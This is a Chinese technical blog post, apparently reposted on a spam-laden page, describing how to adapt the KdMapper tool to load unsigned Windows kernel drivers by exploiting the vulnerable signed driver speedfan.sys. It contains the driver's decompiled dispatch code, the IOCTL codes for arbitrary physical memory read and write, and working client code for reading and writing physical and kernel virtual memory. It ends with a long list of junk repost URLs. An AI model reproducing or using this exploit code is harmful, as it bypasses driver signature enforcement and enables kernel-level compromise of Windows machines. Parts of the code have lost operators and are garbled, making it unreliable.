宁波网站建设报价多少,智慧软文网,昆明小程序制作公司,提供邢台企业做网站1.背景 KdMapper是一个利用intel的驱动漏洞可以无痕的加载未经签名的驱动#xff0c;本文是利用其它漏洞#xff08;参考《【转载】利用签名驱动漏洞加载未签名驱动》#xff09;做相应的修改以实现类似功能。需要大家对KdMapper的代码有一定了解。 2.驱动信息 驱动名称spee…1.背景 KdMapper是一个利用intel的驱动漏洞可以无痕的加载未经签名的驱动本文是利用其它漏洞参考《【转载】利用签名驱动漏洞加载未签名驱动》做相应的修改以实现类似功能。需要大家对KdMapper的代码有一定了解。 2.驱动信息 驱动名称speedfan.sys 时间戳50DF59B7MD50FFE35F0B0CD5A324BBE22F02569AE3B文件版本2.3.11.0设备名称 \\.\SpeedFan读物理内存0x9C402428写物理内存0x9C40242CWindows 7支持Windows 10不支持Windows 11不支持 3.IDA分析
3.1 入口函数 NTSTATUS __stdcall DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{unsigned __int64 v2; // raxv2 BugCheckParameter2;if (!BugCheckParameter2 || BugCheckParameter2 0x2B992DDFA232i64){v2 ((unsigned __int64)BugCheckParameter2 ^ MEMORY[0xFFFFF78000000320]) 0xFFFFFFFFFFFFi64;if (!v2)v2 0x2B992DDFA232i64;BugCheckParameter2 v2;}BugCheckParameter3 ~v2;return CreateDevice(DriverObject, RegistryPath);
} 3.2 创建设备和符号链接 NTSTATUS __fastcall CreateDevice(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{NTSTATUS result; // eax_UNICODE_STRING* v5; // rdisize_t v6; // rax__int64 v7; // r8NTSTATUS v8; // eaxNTSTATUS v9; // edi__int64 v10; // [rsp20h] [rbp-38h]struct _UNICODE_STRING DestinationString; // [rsp40h] [rbp-18h] BYREFPDEVICE_OBJECT DeviceObject; // [rsp68h] [rbp10h] BYREFRtlInitUnicodeString(DestinationString, aDeviceSpeedfan);result IoCreateDevice(DriverObject, RegistryPath-Length 114, DestinationString, 0x9C40u, 0, 0, DeviceObject);if (result 0){DeviceObject-Flags | 4u;v5 (_UNICODE_STRING*)DeviceObject-DeviceExtension;*(_DWORD*)v5[2].Length 0;*(_DWORD*)(v5[2].MaximumLength 1) 0;LODWORD(v5[2].Buffer) 0;v5[1].MaximumLength RegistryPath-MaximumLength;v6 RegistryPath-Length;v5[1].Buffer v5[7].Length;v5[1].Length v6;memmove(v5[7], RegistryPath-Buffer, v6);sub_175B4(v5);if ((int)sub_176C8(v5) 0){v7 *(unsigned int*)v5[2].Length;if (_bittest((const int*)v7, 0x1Du)){LODWORD(v10) v5[2].Buffer;DbgPrint(SpeedFan %s Built Dec 29 2012 21:59:34 Debug %08X Break %08X Setup %08X\n,aX20311,v7,*(unsigned int*)(v5[2].MaximumLength 1),v10);}}v8 IoCreateSymbolicLink(v5, DestinationString);v9 v8;if (v8 0 || v8 0xC0000035){DriverObject-DriverUnload (PDRIVER_UNLOAD)sub_17008;DriverObject-MajorFunction[0] (PDRIVER_DISPATCH)sub_11008;DriverObject-MajorFunction[2] (PDRIVER_DISPATCH)sub_114C8;DriverObject-MajorFunction[14] (PDRIVER_DISPATCH)DeviceIoControl;result 0;}else{IoDeleteDevice(DeviceObject);result v9;}}return result;
} 3.3 DeviceIoControl __int64 __fastcall DeviceIoControl(PDEVICE_OBJECT pDeviceObject, IRP* pIrp)
{_IO_STACK_LOCATION* pIosp; // raxint ntStatus; // ebxPHYSICAL_ADDRESS* pMemoryInfo; // rdiunsigned int nInputBufferLength; // er12SIZE_T nOutputBufferLength; // r13unsigned int nIoControlCode; // esiLONGLONG PhysicalAddressV31; // rbxPVOID pMappedIoSpaceV32; // raxvoid* pMappedIoSpaceV33; // r14LONGLONG PhysicalAddressV34; // rbxPVOID pMappedIoSpaceV35; // raxvoid* pMappedIoSpaceV36; // r14void* Dst; // [rsp20h] [rbp-D8h]LONGLONG PhysicalAddressV52; // [rsp70h] [rbp-88h]LONGLONG PhysicalAddressV53; // [rsp70h] [rbp-88h]void* PhysicalAddress; // [rsp100h] [rbp8h]IRP* Irp; // [rsp108h] [rbp10h]Irp pIrp;pIosp pIrp-Tail.Overlay.CurrentStackLocation;pIrp-IoStatus.Information 0i64;ntStatus 0xC0000023;pMemoryInfo (PHYSICAL_ADDRESS*)pIrp-AssociatedIrp.SystemBuffer;nInputBufferLength pIosp-Parameters.DeviceIoControl.InputBufferLength;nOutputBufferLength pIosp-Parameters.DeviceIoControl.OutputBufferLength;nIoControlCode pIosp-Parameters.DeviceIoControl.IoControlCode;......switch (nIoControlCode){case 0x9C402428:if (nInputBufferLength 8 (_DWORD)nOutputBufferLength)// 读物理内存{PhysicalAddressV34 pMemoryInfo-QuadPart;PhysicalAddressV53 pMemoryInfo-QuadPart;pMappedIoSpaceV35 MmMapIoSpace(*pMemoryInfo, nOutputBufferLength, MmNonCached);pMappedIoSpaceV36 pMappedIoSpaceV35;*(_QWORD*)MajorVersion pMappedIoSpaceV35;if (pMappedIoSpaceV35){if (_bittest(v55, 0xEu)){LODWORD(v47) nOutputBufferLength;DbgPrint(IOCTL_PHYMEM_READ ofo %p pad %08X_%08X vad %p siz %06X\n,v51,HIDWORD(PhysicalAddressV53),(unsigned int)PhysicalAddressV34,pMappedIoSpaceV35,v47);}memmove(pMemoryInfo, pMappedIoSpaceV36, nOutputBufferLength);Irp-IoStatus.Information nOutputBufferLength;ntStatus 0;v59 0;MmUnmapIoSpace(pMappedIoSpaceV36, (unsigned int)nOutputBufferLength);}else{ntStatus 0xC0000088;}}goto LABEL_145;case 0x9C40242C:if (nInputBufferLength 8) // 写物理内存{PhysicalAddressV31 pMemoryInfo-QuadPart;PhysicalAddressV52 pMemoryInfo-QuadPart;nInputBufferLength - 8;pMappedIoSpaceV32 MmMapIoSpace(*pMemoryInfo, nInputBufferLength, MmNonCached);pMappedIoSpaceV33 pMappedIoSpaceV32;*(_QWORD*)MajorVersion pMappedIoSpaceV32;if (pMappedIoSpaceV32){if (_bittest(v55, 0xEu)){LODWORD(v47) nInputBufferLength;DbgPrint(IOCTL_PHYMEM_WRITE ofo %p pad %08X_%08X vad %p siz %06X\n,v51,HIDWORD(PhysicalAddressV52),(unsigned int)PhysicalAddressV31,pMappedIoSpaceV32,v47);}memmove(pMappedIoSpaceV33, pMemoryInfo[1], nInputBufferLength);Irp-IoStatus.Information 0i64;ntStatus 0;v59 0;MmUnmapIoSpace(pMappedIoSpaceV33, nInputBufferLength);}else{ntStatus 0xC0000088;}}goto LABEL_145;LABEL_145:if (ntStatus 0)goto LABEL_149;v5 v51;goto LABEL_147;}......LABEL_149:Irp-IoStatus.Status ntStatus;IofCompleteRequest(Irp, 0);return (unsigned int)ntStatus;
} 其中 0x9C402428 为读取物理内存 0x9C40242C 为写入物理内存。 3.4 使用注意事项 实现使用的是MmMapIoSpace将物理内存映射到进程空间或者之后再读写。由于使用了物理内存在代码过程中会遇到物理页面和虚拟页面不一一对应的问题问题说明及解决办法见《KdMapper扩展中遇到的相关问题》。 4. 代码实现
4.1 .h文件 #ifndef RtlOffsetToPointer
#define RtlOffsetToPointer(Base, Offset) ((PCHAR)( ((PCHAR)(Base)) ((ULONG_PTR)(Offset)) ))
#endif#ifndef RtlPointerToOffset
#define RtlPointerToOffset(Base, Pointer) ((ULONG)( ((PCHAR)(Pointer)) - ((PCHAR)(Base)) ))
#endif#define SPEEDFAN_DEVICE_TYPE (DWORD)0x9C40
#define SPEEDFAN_READ_PHYSICAL_MEMORY_FUNCID (DWORD)0x90A
#define SPEEDFAN_WRITE_PHYSICAL_MEMORY_FUNCID (DWORD)0x90B#define IOCTL_SPEEDFAN_READ_PHYSICAL_MEMORY \CTL_CODE(SPEEDFAN_DEVICE_TYPE, SPEEDFAN_READ_PHYSICAL_MEMORY_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x9C402428
#define IOCTL_SPEEDFAN_WRITE_PHYSICAL_MEMORY \CTL_CODE(SPEEDFAN_DEVICE_TYPE, SPEEDFAN_WRITE_PHYSICAL_MEMORY_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x9C40242C4.2 .c文件 NTSTATUS sokno_driver::SuperCallDriverEx(_In_ HANDLE DeviceHandle,_In_ ULONG IoControlCode,_In_ PVOID InputBuffer,_In_ ULONG InputBufferLength,_In_opt_ PVOID OutputBuffer,_In_opt_ ULONG OutputBufferLength,_Out_opt_ PIO_STATUS_BLOCK IoStatus)
{IO_STATUS_BLOCK ioStatus;NTSTATUS ntStatus NtDeviceIoControlFile(DeviceHandle,NULL,NULL,NULL,ioStatus,IoControlCode,InputBuffer,InputBufferLength,OutputBuffer,OutputBufferLength);if (ntStatus STATUS_PENDING) {ntStatus NtWaitForSingleObject(DeviceHandle,FALSE,NULL);}if (IoStatus)*IoStatus ioStatus;return ntStatus;
}BOOL sokno_driver::SuperCallDriver(_In_ HANDLE DeviceHandle,_In_ ULONG IoControlCode,_In_ PVOID InputBuffer,_In_ ULONG InputBufferLength,_In_opt_ PVOID OutputBuffer,_In_opt_ ULONG OutputBufferLength)
{BOOL bResult;IO_STATUS_BLOCK ioStatus;NTSTATUS ntStatus SuperCallDriverEx(DeviceHandle,IoControlCode,InputBuffer,InputBufferLength,OutputBuffer,OutputBufferLength,ioStatus);bResult NT_SUCCESS(ntStatus);SetLastError(RtlNtStatusToDosError(ntStatus));return bResult;
}BOOL WINAPI sokno_driver::SuperReadWritePhysicalMemory(_In_ HANDLE DeviceHandle,_In_ ULONG_PTR PhysicalAddress,_In_reads_bytes_(NumberOfBytes) PVOID Buffer,_In_ ULONG NumberOfBytes,_In_ BOOLEAN DoWrite)
{BOOL bResult FALSE;DWORD dwError ERROR_SUCCESS;__try {if (DoWrite) {PPHYSICAL_ADDRESS pWriteInfo (PPHYSICAL_ADDRESS)malloc(sizeof(PHYSICAL_ADDRESS) NumberOfBytes);if (pWriteInfo){pWriteInfo-QuadPart PhysicalAddress;RtlCopyMemory(pWriteInfo[1], Buffer, NumberOfBytes);bResult SuperCallDriver(DeviceHandle, IOCTL_SPEEDFAN_WRITE_PHYSICAL_MEMORY, pWriteInfo, sizeof(PHYSICAL_ADDRESS) NumberOfBytes, NULL, NULL);if (!bResult){Log(LSuperReadWritePhysicalMemory Write Memory SuperCallDriver failed\r\n);}}else{Log(LSuperReadWritePhysicalMemory Write Memory malloc failed\r\n);}}else {PHYSICAL_ADDRESS address;address.QuadPart PhysicalAddress;bResult SuperCallDriver(DeviceHandle, IOCTL_SPEEDFAN_READ_PHYSICAL_MEMORY, address, sizeof(address), Buffer, NumberOfBytes);if (!bResult){Log(LSuperReadWritePhysicalMemory Read Memory SuperCallDriver failed\r\n);}}}__except (EXCEPTION_EXECUTE_HANDLER) {bResult FALSE;dwError GetExceptionCode();Log(L[!] Error AtszioReadWritePhysicalMemory Exception! std::endl);}SetLastError(dwError);return bResult;
}BOOL WINAPI sokno_driver::SuperReadPhysicalMemory(_In_ HANDLE DeviceHandle,_In_ ULONG_PTR PhysicalAddress,_In_ PVOID Buffer,_In_ ULONG NumberOfBytes)
{return SuperReadWritePhysicalMemory(DeviceHandle,PhysicalAddress,Buffer,NumberOfBytes,FALSE);
}BOOL WINAPI sokno_driver::SuperWritePhysicalMemory(_In_ HANDLE DeviceHandle,_In_ ULONG_PTR PhysicalAddress,_In_reads_bytes_(NumberOfBytes) PVOID Buffer,_In_ ULONG NumberOfBytes)
{return SuperReadWritePhysicalMemory(DeviceHandle,PhysicalAddress,Buffer,NumberOfBytes,TRUE);
}BOOL WINAPI sokno_driver::SuperWriteKernelVirtualMemory(_In_ HANDLE DeviceHandle,_In_ ULONG_PTR Address,_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,_In_ ULONG NumberOfBytes)
{BOOL bResult;ULONG_PTR physicalAddress 0;SetLastError(ERROR_SUCCESS);bResult SuperVirtualToPhysical(DeviceHandle,Address,physicalAddress);if (bResult) {bResult SuperReadWritePhysicalMemory(DeviceHandle,physicalAddress,Buffer,NumberOfBytes,TRUE);}return bResult;
}BOOL WINAPI sokno_driver::SuperReadKernelVirtualMemory(_In_ HANDLE DeviceHandle,_In_ ULONG_PTR Address,_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,_In_ ULONG NumberOfBytes)
{BOOL bResult;ULONG_PTR physicalAddress 0;SetLastError(ERROR_SUCCESS);bResult SuperVirtualToPhysical(DeviceHandle,Address,physicalAddress);if (bResult) {bResult SuperReadWritePhysicalMemory(DeviceHandle,physicalAddress,Buffer,NumberOfBytes,FALSE);}return bResult;
}其中 SuperReadKernelVirtualMemory 和 SuperWriteKernelVirtualMemory 读写虚拟地址内存页面中的 虚拟地址转物理地址函数 SuperVirtualToPhysical 的实现在《KdMapper扩展实现之虚拟地址转物理地址 》一文中有介绍。 同时由于使用了MmMapIoSpace,故其只能在Win7上运行详见《KdMapper扩展实现之虚拟地址转物理地址 》。 5. 运行效果 Windows 7 x64 环境上运行的效果如下其中驱动 HelloWorld.sys为未签名的驱动其详细说明见文章《KdMapper被加载驱动的实现》。
6.特别提示 使用 speedfan.sys 制作的KdMapper只能在Win 7 x64环境上运行Win10以上环境由于使用了MmMapIoSpace会导致蓝屏。 文章转载自: http://www.morning.xjqkh.cn.gov.cn.xjqkh.cn http://www.morning.wfbs.cn.gov.cn.wfbs.cn http://www.morning.nrlsg.cn.gov.cn.nrlsg.cn http://www.morning.rsmtx.cn.gov.cn.rsmtx.cn http://www.morning.w58hje.cn.gov.cn.w58hje.cn http://www.morning.rbbyd.cn.gov.cn.rbbyd.cn http://www.morning.pbygt.cn.gov.cn.pbygt.cn http://www.morning.qczjc.cn.gov.cn.qczjc.cn http://www.morning.mbqyl.cn.gov.cn.mbqyl.cn http://www.morning.xnflx.cn.gov.cn.xnflx.cn http://www.morning.lhrxq.cn.gov.cn.lhrxq.cn http://www.morning.yrcxg.cn.gov.cn.yrcxg.cn http://www.morning.rdnkx.cn.gov.cn.rdnkx.cn http://www.morning.smdnl.cn.gov.cn.smdnl.cn http://www.morning.yltnl.cn.gov.cn.yltnl.cn http://www.morning.mznqz.cn.gov.cn.mznqz.cn http://www.morning.qgtbx.cn.gov.cn.qgtbx.cn http://www.morning.gbyng.cn.gov.cn.gbyng.cn http://www.morning.bkkgt.cn.gov.cn.bkkgt.cn http://www.morning.ntqqm.cn.gov.cn.ntqqm.cn http://www.morning.jwqqd.cn.gov.cn.jwqqd.cn http://www.morning.txmkx.cn.gov.cn.txmkx.cn http://www.morning.bsxws.cn.gov.cn.bsxws.cn http://www.morning.kjlhb.cn.gov.cn.kjlhb.cn http://www.morning.zcfmb.cn.gov.cn.zcfmb.cn http://www.morning.syhwc.cn.gov.cn.syhwc.cn http://www.morning.yjxfj.cn.gov.cn.yjxfj.cn http://www.morning.mehrim.com.gov.cn.mehrim.com http://www.morning.yxbdl.cn.gov.cn.yxbdl.cn http://www.morning.pqqxc.cn.gov.cn.pqqxc.cn http://www.morning.lsqmb.cn.gov.cn.lsqmb.cn http://www.morning.lfpdc.cn.gov.cn.lfpdc.cn http://www.morning.yckwt.cn.gov.cn.yckwt.cn http://www.morning.lynkz.cn.gov.cn.lynkz.cn http://www.morning.wlfxn.cn.gov.cn.wlfxn.cn http://www.morning.gblrn.cn.gov.cn.gblrn.cn http://www.morning.jtmql.cn.gov.cn.jtmql.cn http://www.morning.qwpdl.cn.gov.cn.qwpdl.cn http://www.morning.wynqg.cn.gov.cn.wynqg.cn http://www.morning.dhqg.cn.gov.cn.dhqg.cn http://www.morning.sftpg.cn.gov.cn.sftpg.cn http://www.morning.bslkt.cn.gov.cn.bslkt.cn http://www.morning.jfbbq.cn.gov.cn.jfbbq.cn http://www.morning.bzlsf.cn.gov.cn.bzlsf.cn http://www.morning.dbfwq.cn.gov.cn.dbfwq.cn http://www.morning.lxqyf.cn.gov.cn.lxqyf.cn http://www.morning.nlzpj.cn.gov.cn.nlzpj.cn http://www.morning.gwgjl.cn.gov.cn.gwgjl.cn http://www.morning.tqbqb.cn.gov.cn.tqbqb.cn http://www.morning.wpydf.cn.gov.cn.wpydf.cn http://www.morning.tqdqc.cn.gov.cn.tqdqc.cn http://www.morning.lslin.com.gov.cn.lslin.com http://www.morning.dytqf.cn.gov.cn.dytqf.cn http://www.morning.scjtr.cn.gov.cn.scjtr.cn http://www.morning.jzsgn.cn.gov.cn.jzsgn.cn http://www.morning.mjtft.cn.gov.cn.mjtft.cn http://www.morning.gjws.cn.gov.cn.gjws.cn http://www.morning.xphcg.cn.gov.cn.xphcg.cn http://www.morning.pszw.cn.gov.cn.pszw.cn http://www.morning.krklj.cn.gov.cn.krklj.cn http://www.morning.zlmbc.cn.gov.cn.zlmbc.cn http://www.morning.jmwrj.cn.gov.cn.jmwrj.cn http://www.morning.rpth.cn.gov.cn.rpth.cn http://www.morning.bwdnx.cn.gov.cn.bwdnx.cn http://www.morning.nhgkm.cn.gov.cn.nhgkm.cn http://www.morning.hhpbj.cn.gov.cn.hhpbj.cn http://www.morning.wpsfc.cn.gov.cn.wpsfc.cn http://www.morning.dspqc.cn.gov.cn.dspqc.cn http://www.morning.bflwj.cn.gov.cn.bflwj.cn http://www.morning.ydrfl.cn.gov.cn.ydrfl.cn http://www.morning.ymwnc.cn.gov.cn.ymwnc.cn http://www.morning.fjmfq.cn.gov.cn.fjmfq.cn http://www.morning.yhxhq.cn.gov.cn.yhxhq.cn http://www.morning.mftzm.cn.gov.cn.mftzm.cn http://www.morning.tstwx.cn.gov.cn.tstwx.cn http://www.morning.ydmml.cn.gov.cn.ydmml.cn http://www.morning.cbczs.cn.gov.cn.cbczs.cn http://www.morning.pqypt.cn.gov.cn.pqypt.cn http://www.morning.qdlnw.cn.gov.cn.qdlnw.cn http://www.morning.fglth.cn.gov.cn.fglth.cn
